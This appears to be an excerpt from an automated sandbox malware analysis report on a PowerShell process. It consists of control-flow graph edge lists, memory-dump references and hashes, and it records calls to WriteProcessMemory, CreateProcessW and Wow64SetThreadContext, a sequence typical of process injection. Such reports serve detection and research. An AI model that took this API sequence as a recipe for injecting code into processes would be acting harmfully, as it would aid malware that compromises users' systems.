                                                                                                                                                                                                              control_flow_graph 1167 70a095b-70a0971 1168 70a0973-70a099b 1167->1168 1169 70a0951-70a0955 1167->1169 1171 70a09a1-70a09a6 1168->1171 1172 70a0b76-70a0b7c 1168->1172 1173 70a09a8-70a09ae 1171->1173 1174 70a09be-70a09c2 1171->1174 1182 70a0b7e 1172->1182 1183 70a0b61-70a0b73 1172->1183 1175 70a09b2-70a09bc 1173->1175 1176 70a09b0 1173->1176 1177 70a09c8-70a09cc 1174->1177 1178 70a0b23-70a0b2d 1174->1178 1175->1174 1176->1174 1180 70a09ce-70a09dd 1177->1180 1181 70a09df 1177->1181 1184 70a0b3b-70a0b41 1178->1184 1185 70a0b2f-70a0b38 1178->1185 1186 70a09e1-70a09e3 1180->1186 1181->1186 1187 70a0b82-70a0b84 1182->1187 1188 70a0b80-70a0b81 1182->1188 1189 70a0b43-70a0b45 1184->1189 1190 70a0b47-70a0b53 1184->1190 1186->1178 1193 70a09e9-70a0a09 1186->1193 1194 70a0b91-70a0bbb 1187->1194 1195 70a0b86-70a0b90 1187->1195 1188->1187 1196 70a0b55-70a0b5e 1189->1196 1190->1196 1224 70a0a0b-70a0a26 1193->1224 1225 70a0a28 1193->1225 1198 70a0d12-70a0d18 1194->1198 1199 70a0bc1-70a0bc6 1194->1199 1195->1194 1197 70a0bf8 1195->1197 1196->1183 1202 70a0bfc-70a0bfe 1197->1202 1216 70a0d1a 1198->1216 1217 70a0cfd-70a0d0f 1198->1217 1204 70a0bc8-70a0bce 1199->1204 1205 70a0bde-70a0be2 1199->1205 1207 70a0cbf-70a0cc9 1202->1207 1208 70a0c04-70a0c08 1202->1208 1210 70a0bd2-70a0bdc 1204->1210 1211 70a0bd0 1204->1211 1206 70a0be8-70a0bea 1205->1206 1205->1207 1212 70a0bfa 1206->1212 1213 70a0bec-70a0bf5 1206->1213 1218 70a0ccb-70a0cd4 1207->1218 1219 70a0cd7-70a0cdd 1207->1219 1214 70a0c0a-70a0c26 1208->1214 1215 70a0c28 1208->1215 1210->1205 1211->1205 1212->1202 1213->1197 1228 70a0c2a-70a0c2c 1214->1228 1215->1228 1222 70a0d1e-70a0d5e 1216->1222 1223 70a0d1c 1216->1223 1226 70a0cdf-70a0ce1 1219->1226 1227 70a0ce3-70a0cef 1219->1227 1232 70a0ecb-70a0ed6 1222->1232 1233 70a0d64-70a0d69 1222->1233 1223->1222 1234 70a0a2a-70a0a2c 1224->1234 1225->1234 1235 70a0cf1-70a0cfb 1226->1235 1227->1235 1228->1207 1229 70a0c32-70a0c35 1228->1229 1243 70a0c3f-70a0c45 1229->1243 1257 70a0eda-70a0efd 1232->1257 1258 70a0ed8 1232->1258 1238 70a0d6b-70a0d71 1233->1238 1239 70a0d81-70a0d85 1233->1239 1234->1178 1237 70a0a32-70a0a34 1234->1237 1235->1217 1244 70a0a36-70a0a42 1237->1244 1245 70a0a44 1237->1245 1241 70a0d73 1238->1241 1242 70a0d75-70a0d7f 1238->1242 1247 70a0e7a-70a0e84 1239->1247 1248 70a0d8b-70a0d8d 1239->1248 1241->1239 1242->1239 1264 70a0c4b-70a0c4d 1243->1264 1254 70a0a46-70a0a48 1244->1254 1245->1254 1251 70a0e92-70a0e98 1247->1251 1252 70a0e86-70a0e8f 1247->1252 1255 70a0d8f-70a0d9b 1248->1255 1256 70a0d9d 1248->1256 1261 70a0e9a-70a0e9c 1251->1261 1262 70a0e9e-70a0eaa 1251->1262 1254->1178 1265 70a0a4e-70a0a6e 1254->1265 1266 70a0d9f-70a0da1 1255->1266 1256->1266 1259 70a0eff-70a0f0b 1257->1259 1260 70a0f0d 1257->1260 1258->1257 1267 70a0f0f-70a0f11 1259->1267 1260->1267 1268 70a0eac-70a0ec8 1261->1268 1262->1268 1269 70a0c4f-70a0c55 1264->1269 1270 70a0c65-70a0cbc 1264->1270 1293 70a0a70-70a0a76 1265->1293 1294 70a0a86-70a0a8a 1265->1294 1266->1247 1271 70a0da7-70a0da9 1266->1271 1272 70a0f5d-70a0f67 1267->1272 1273 70a0f13-70a0f19 1267->1273 1275 70a0c59-70a0c5b 1269->1275 1276 70a0c57 1269->1276 1279 70a0dab-70a0db7 1271->1279 1280 70a0db9 1271->1280 1285 70a0f69-70a0f6f 1272->1285 1286 70a0f72-70a0f78 1272->1286 1281 70a0f1b-70a0f1d 1273->1281 1282 70a0f27-70a0f44 1273->1282 1275->1270 1276->1270 1284 70a0dbb-70a0dbd 1279->1284 1280->1284 1281->1282 1301 70a0faa-70a0faf 1282->1301 1302 70a0f46-70a0f57 1282->1302 1284->1247 1288 70a0dc3-70a0dc5 1284->1288 1289 70a0f7a-70a0f7c 1286->1289 1290 70a0f7e-70a0f8a 1286->1290 1295 70a0ddf-70a0de3 1288->1295 1296 70a0dc7-70a0dcd 1288->1296 1297 70a0f8c-70a0fa7 1289->1297 1290->1297 1303 70a0a7a-70a0a7c 1293->1303 1304 70a0a78 1293->1304 1305 70a0a8c-70a0a92 1294->1305 1306 70a0aa4-70a0aa8 1294->1306 1299 70a0dfd-70a0e77 1295->1299 1300 70a0de5-70a0deb 1295->1300 1307 70a0dcf 1296->1307 1308 70a0dd1-70a0ddd 1296->1308 1310 70a0def-70a0dfb 1300->1310 1311 70a0ded 1300->1311 1301->1302 1302->1272 1303->1294 1304->1294 1312 70a0a96-70a0aa2 1305->1312 1313 70a0a94 1305->1313 1314 70a0aaf-70a0ab1 1306->1314 1307->1295 1308->1295 1310->1299 1311->1299 1312->1306 1313->1306 1319 70a0ac9-70a0b20 1314->1319 1320 70a0ab3-70a0ab9 1314->1320 1323 70a0abb 1320->1323 1324 70a0abd-70a0abf 1320->1324 1323->1319 1324->1319
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-2291298209
                                                                                                                                                                                                              • Opcode ID: 6d358f0e994cd64b8764777a3136ae2ddea75d2b92fc03b6b4006e2023e9ccee
                                                                                                                                                                                                              • Instruction ID: f7ef228b7ed4a6a12e2778d7cabb5289d0f69b56ca65ccd0b90de574e2fe11d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d358f0e994cd64b8764777a3136ae2ddea75d2b92fc03b6b4006e2023e9ccee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA3135F0A1430EAFEB648EA4D5107BE7BE4AF92314F148266D414CB191FB35C980C7B1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1328 70a142b-70a146e 1330 70a161a-70a1620 1328->1330 1331 70a1474-70a1479 1328->1331 1339 70a1622 1330->1339 1340 70a1605-70a1617 1330->1340 1332 70a147b-70a1481 1331->1332 1333 70a1491-70a1495 1331->1333 1334 70a1483 1332->1334 1335 70a1485-70a148f 1332->1335 1336 70a149b-70a149d 1333->1336 1337 70a15c6-70a15d0 1333->1337 1334->1333 1335->1333 1343 70a149f-70a14ab 1336->1343 1344 70a14ad 1336->1344 1341 70a15de-70a15e4 1337->1341 1342 70a15d2-70a15db 1337->1342 1346 70a1626-70a1662 1339->1346 1347 70a1624 1339->1347 1348 70a15ea-70a15f6 1341->1348 1349 70a15e6-70a15e8 1341->1349 1350 70a14af-70a14b1 1343->1350 1344->1350 1352 70a1668-70a166d 1346->1352 1353 70a1794-70a179c 1346->1353 1347->1346 1354 70a15f8-70a1602 1348->1354 1349->1354 1350->1337 1351 70a14b7-70a14bb 1350->1351 1356 70a14ce 1351->1356 1357 70a14bd-70a14cc 1351->1357 1358 70a166f-70a1675 1352->1358 1359 70a1685-70a1689 1352->1359 1371 70a179e 1353->1371 1372 70a1781-70a1791 1353->1372 1354->1340 1361 70a14d0-70a14d2 1356->1361 1357->1361 1362 70a1679-70a1683 1358->1362 1363 70a1677 1358->1363 1365 70a168f-70a1691 1359->1365 1366 70a1746-70a1750 1359->1366 1361->1337 1368 70a14d8-70a14da 1361->1368 1362->1359 1363->1359 1369 70a1693-70a169f 1365->1369 1370 70a16a1 1365->1370 1373 70a175d-70a1763 1366->1373 1374 70a1752-70a175a 1366->1374 1377 70a14ea 1368->1377 1378 70a14dc-70a14e8 1368->1378 1380 70a16a3-70a16a5 1369->1380 1370->1380 1381 70a17a2-70a17c5 1371->1381 1382 70a17a0 1371->1382 1375 70a1769-70a1775 1373->1375 1376 70a1765-70a1767 1373->1376 1385 70a1777-70a177f 1375->1385 1376->1385 1386 70a14ec-70a14ee 1377->1386 1378->1386 1380->1366 1388 70a16ab-70a16ad 1380->1388 1383 70a17c7-70a17d3 1381->1383 1384 70a17d5 1381->1384 1382->1381 1389 70a17d7-70a17d9 1383->1389 1384->1389 1385->1372 1386->1337 1391 70a14f4-70a14f6 1386->1391 1392 70a16af-70a16b5 1388->1392 1393 70a16c7-70a16d2 1388->1393 1396 70a17db-70a17fa 1389->1396 1397 70a1847-70a1851 1389->1397 1399 70a14f8-70a14fe 1391->1399 1400 70a1510-70a151b 1391->1400 1394 70a16b9-70a16c5 1392->1394 1395 70a16b7 1392->1395 1412 70a16ea-70a1743 1393->1412 1413 70a16d4-70a16da 1393->1413 1394->1393 1395->1393 1426 70a180a 1396->1426 1427 70a17fc-70a1808 1396->1427 1401 70a185a-70a1860 1397->1401 1402 70a1853-70a1857 1397->1402 1404 70a1502-70a150e 1399->1404 1405 70a1500 1399->1405 1406 70a152a-70a1536 1400->1406 1407 70a151d-70a1520 1400->1407 1408 70a1862-70a1864 1401->1408 1409 70a1866-70a1872 1401->1409 1404->1400 1405->1400 1414 70a1538-70a153a 1406->1414 1415 70a1544-70a154b 1406->1415 1407->1406 1417 70a1874-70a1892 1408->1417 1409->1417 1418 70a16de-70a16e0 1413->1418 1419 70a16dc 1413->1419 1414->1415 1421 70a1552-70a1554 1415->1421 1418->1412 1419->1412 1424 70a156c-70a15c3 1421->1424 1425 70a1556-70a155c 1421->1425 1429 70a155e 1425->1429 1430 70a1560-70a1562 1425->1430 1432 70a180c-70a180e 1426->1432 1427->1432 1429->1424 1430->1424 1432->1397 1433 70a1810-70a182d 1432->1433 1436 70a182f-70a1841 1433->1436 1437 70a1895-70a189a 1433->1437 1436->1397 1437->1436
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$$^q$$^q
                                                                                                                                                                                                              • API String ID: 0-2291298209
                                                                                                                                                                                                              • Opcode ID: 6eaf4a6001a98278180b085ba15b659d5ed135189079b35e31ebd58b9ee99b1c
                                                                                                                                                                                                              • Instruction ID: 1b1dbd576ae9e7ba50c06ad07cf8f7c5f5e35cdb2c5c728dd543a2483c0192d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6eaf4a6001a98278180b085ba15b659d5ed135189079b35e31ebd58b9ee99b1c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B231C2B5D0430EFFCF658FBDC5402AA7BF5AF42260F1986A6D8158B251E734C944CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1439 420cfd4-420d42e 1442 420d430-420d436 1439->1442 1443 420d438-420d471 WriteProcessMemory 1439->1443 1442->1443 1444 420d473-420d479 1443->1444 1445 420d47a-420d49b 1443->1445 1444->1445
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A24789D,00000000,?,?,?,?,00000000,?,0420C573,?,00000000,?), ref: 0420D464
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                              • Opcode ID: fb35cd707031df407abd32122b99cab08e04194cdc2ad75401b70ad14e375e92
                                                                                                                                                                                                              • Instruction ID: 8c2e41fa15f2cc30f008cbc5fae51f788dfed13c19bbbe97ac68be88cdde5d2d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb35cd707031df407abd32122b99cab08e04194cdc2ad75401b70ad14e375e92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D316BB59163499FDB11CFA9C884ADEBFF4FF09310F1584AAE444E7251C338A944CBA5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1447 420cc24-420cca9 1449 420ccb1-420ccb8 1447->1449 1450 420ccab-420ccae 1447->1450 1451 420ccc3-420ccd9 1449->1451 1452 420ccba-420ccc0 1449->1452 1450->1449 1453 420cce4-420cd87 CreateProcessW 1451->1453 1454 420ccdb-420cce1 1451->1454 1452->1451 1456 420cd90-420ce08 1453->1456 1457 420cd89-420cd8f 1453->1457 1454->1453 1464 420ce1a-420ce21 1456->1464 1465 420ce0a-420ce10 1456->1465 1457->1456 1466 420ce23-420ce32 1464->1466 1467 420ce38 1464->1467 1465->1464 1466->1467 1469 420ce39 1467->1469 1469->1469
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0420CD74
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                                              • Opcode ID: fb96032dc6888ac7f09861e997b576dfb420efd7bdd7084ce1b711ceebbd3856
                                                                                                                                                                                                              • Instruction ID: 1123717fed32ea9c36bd99ad75236de46f400d7cf9906f1c8a806b91f2f87608
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb96032dc6888ac7f09861e997b576dfb420efd7bdd7084ce1b711ceebbd3856
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31513AB1D0121ADFDB24CF59C840BDDBBB5BF48314F1485AAE909B7250D775AA88CF50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1470 42077b4-420cca9 1472 420ccb1-420ccb8 1470->1472 1473 420ccab-420ccae 1470->1473 1474 420ccc3-420ccd9 1472->1474 1475 420ccba-420ccc0 1472->1475 1473->1472 1476 420cce4-420cd87 CreateProcessW 1474->1476 1477 420ccdb-420cce1 1474->1477 1475->1474 1479 420cd90-420ce08 1476->1479 1480 420cd89-420cd8f 1476->1480 1477->1476 1487 420ce1a-420ce21 1479->1487 1488 420ce0a-420ce10 1479->1488 1480->1479 1489 420ce23-420ce32 1487->1489 1490 420ce38 1487->1490 1488->1487 1489->1490 1492 420ce39 1490->1492 1492->1492
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 0420CD74
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                                              • Opcode ID: d91978bc342fe9300c28321fcd00ced9fac453d46f0521f53c8fd63425f35550
                                                                                                                                                                                                              • Instruction ID: 753044ded64d117b12a20ed09865d966554e555f58092d218b46de55046b580c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d91978bc342fe9300c28321fcd00ced9fac453d46f0521f53c8fd63425f35550
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F5128B190121ADFDB24CF99C940BDDBBF5BF48314F1085AAE909B7250D775AA88CF50

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1493 42077d8-420d42e 1495 420d430-420d436 1493->1495 1496 420d438-420d471 WriteProcessMemory 1493->1496 1495->1496 1497 420d473-420d479 1496->1497 1498 420d47a-420d49b 1496->1498 1497->1498
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A24789D,00000000,?,?,?,?,00000000,?,0420C573,?,00000000,?), ref: 0420D464
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                              • Opcode ID: 87ca32e6fc80cf7fe5510ce9b61279a95c7fa363a7ffa3d6b9f78a0fce49a291
                                                                                                                                                                                                              • Instruction ID: e4394aa9ff6306a65413afb1e540329c5053fa372bcf2ae90219cbc7da6831fe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87ca32e6fc80cf7fe5510ce9b61279a95c7fa363a7ffa3d6b9f78a0fce49a291
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3521F5B19113099FDB10CF99D884BDEBBF4FB48320F50842AE518A7241D378A944CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1507 42077e4-420ceb0 1509 420ceb2-420ceba 1507->1509 1510 420cebc-420cee8 Wow64SetThreadContext 1507->1510 1509->1510 1511 420cef1-420cf12 1510->1511 1512 420ceea-420cef0 1510->1512 1512->1511
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0420C24A), ref: 0420CEDB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                              • Opcode ID: ce695e49209c412aa903805391f82b4c00ecdfb97473111ab045bb69c5d3eac4
                                                                                                                                                                                                              • Instruction ID: e8490f36db65b9465ef22fb1d5efb94eac1e297c3aa4705fe95562d6d6f90592
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce695e49209c412aa903805391f82b4c00ecdfb97473111ab045bb69c5d3eac4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F1123B2A103498FDB14CF9AC844BDFBBF5EB88320F14C12AE418A3241D778A545CFA5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1500 42077c0-420ceb0 1502 420ceb2-420ceba 1500->1502 1503 420cebc-420cee8 Wow64SetThreadContext 1500->1503 1502->1503 1504 420cef1-420cf12 1503->1504 1505 420ceea-420cef0 1503->1505 1505->1504
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0420C24A), ref: 0420CEDB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                              • Opcode ID: ec19d5fb8c3127540a5cbf503dc70b7f39ed26c69faa4bce633548e761523a0c
                                                                                                                                                                                                              • Instruction ID: 5ec2c0c91f4abd6b00263aaaf0bed4a0a836300479bd7b2d00929b3203ccd1e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec19d5fb8c3127540a5cbf503dc70b7f39ed26c69faa4bce633548e761523a0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 411126B19103098FDB14CF9AC844BDFBBF4EB88320F14C129E418A3241D778A545CFA5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1514 420ce68-420ceb0 1515 420ceb2-420ceba 1514->1515 1516 420cebc-420cee8 Wow64SetThreadContext 1514->1516 1515->1516 1517 420cef1-420cf12 1516->1517 1518 420ceea-420cef0 1516->1518 1518->1517
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,0420C24A), ref: 0420CEDB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                              • Opcode ID: ddc6fe99daefdd330699dc3d0e65639c347c01a1f2a3f4cb9e189c6648350fd6
                                                                                                                                                                                                              • Instruction ID: bda0fcd214d1217eb393f080786fd6ff40d1bbf5b37f9471463c535842e6ca82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ddc6fe99daefdd330699dc3d0e65639c347c01a1f2a3f4cb9e189c6648350fd6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D1126B1D102498FDB10CF9AC885BDEBBF4EB88320F54852AD418A3640D738A545CF61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5563a3120228cff4e655143c45da91e3b4c4c30cbc1bad140abc5ff538c354ba
                                                                                                                                                                                                              • Instruction ID: c693230d5bd7bbea1cd32bc406b6408405a8ed31453dc80c103f3d33e883550f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5563a3120228cff4e655143c45da91e3b4c4c30cbc1bad140abc5ff538c354ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC517DB4B00208EFDB14DB98C541BAEBBF2AF99314F948569D5056F391CB72EC41CBA1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3b0be731c45ffb49762293535e378708d6c5235d9daf99ca8c412d1317c3d58e
                                                                                                                                                                                                              • Instruction ID: 41c89e8c9451fd5acae5fee5d4ae78ea683b39161070aadbce9d501d6e7c32ea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b0be731c45ffb49762293535e378708d6c5235d9daf99ca8c412d1317c3d58e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D516DB4A00205EFD714CB98C541FAEBBF2EF99314F5581A9D9056F392CA72EC41CBA1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939339032.00000000040FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040FD000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_40fd000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0f7e7b6e62e5b02fe69f9d0f310f3f5e4dd8936da46ed099a49b0db4b26c6659
                                                                                                                                                                                                              • Instruction ID: 71801413c58e31505f7e7ba768b6237bcca8cee0f2623f3a6022c7ec6b206564
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f7e7b6e62e5b02fe69f9d0f310f3f5e4dd8936da46ed099a49b0db4b26c6659
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70012B711043449AE7508F15ECC4B67BFD8DF51325F18C43AEE4A1B682C779A841D7B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939339032.00000000040FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040FD000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_40fd000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7ac00721b2d4f931606f7d132c155a03f193e048e24918dbaf0f4cfc60dc5f6d
                                                                                                                                                                                                              • Instruction ID: 13da2818b5f1f29ad0cd4290c7e192c4e6d171cc9696116ff3a823b84fc67058
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ac00721b2d4f931606f7d132c155a03f193e048e24918dbaf0f4cfc60dc5f6d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97015E7200E3C09EE7528B259C94B52BFB4DF53224F1D80DBDD899F1A3C2695849C772
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1939789425.0000000004200000.00000040.00000800.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_4200000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 14cb2f29a25440842d0be62efabe95f5b5ca2387e99c345457746618528c5ba4
                                                                                                                                                                                                              • Instruction ID: dc54522f80d2f4cc700b07dd39ec77a845790c2957907a3dc358c0bd0330fec1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14cb2f29a25440842d0be62efabe95f5b5ca2387e99c345457746618528c5ba4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C222AD71B2530A9FDB11CF98C8806AAB7F1EF65304F91C866D446EB292E370F985CB51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.1973209244.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_70a0000_powershell.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
